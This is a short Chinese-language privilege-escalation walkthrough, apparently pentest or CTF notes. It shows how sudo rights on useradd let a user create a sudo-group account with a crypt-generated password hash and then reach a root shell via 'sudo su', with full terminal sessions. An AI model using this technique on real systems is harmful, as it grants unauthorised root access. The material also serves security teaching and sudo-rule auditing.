sudo配合useradd命令也是可以用來提權的。整體思路是添加一個組為sudo的用戶,然后用這個新用戶執行sudo su到root
首先看下useradd添加用戶的幾個必要條件,指定組,指定密碼,useradd有這么幾個參數可以使用
Usage: useradd [options] LOGIN useradd -D useradd -D [options] Options: -g, --gid GROUP name or ID of the primary group of the new account -m, --create-home create the user's home directory -p, --password PASSWORD encrypted password of the new account
-g指定組,-m指定home目錄,登錄需要一個默認的home目錄。-p指定密碼,這里的密碼需要encrypted加密過。
步驟一:生成用戶密碼的密文,這里用python的crypt庫來實現,這里123456是密碼,hh隨便指定,相當於鹽
test@test:/etc/ppp$ python Python 2.7.16 (default, Oct 10 2019, 22:02:15) [GCC 8.3.0] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> import crypt import crypt >>> crypt.crypt("123456","hh") crypt.crypt("123456","hh") 'hhYwUmQRSuCZ.' >>> exit exit Use exit() or Ctrl-D (i.e. EOF) to exit >>> exit() exit() test@test:/etc/ppp$
步驟二:利用上面生成的密碼密文配合sudo useradd加一個擁有sudo組的用戶,此時就添加了一個test2的用戶,密碼是123456
test@test:/etc/ppp$ sudo /usr/sbin/useradd -m -g sudo -p hhYwUmQRSuCZ. test2
步驟三:跳到test2用戶
test@test:/etc/ppp$ su test2 su test2 Password: 123456 $ id id uid=1003(test2) gid=27(sudo) groups=27(sudo)
步驟四:跳到root用戶
$ sudo su sudo su We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. [sudo] password for test2: 123456 root@test:/etc/ppp#
提權到root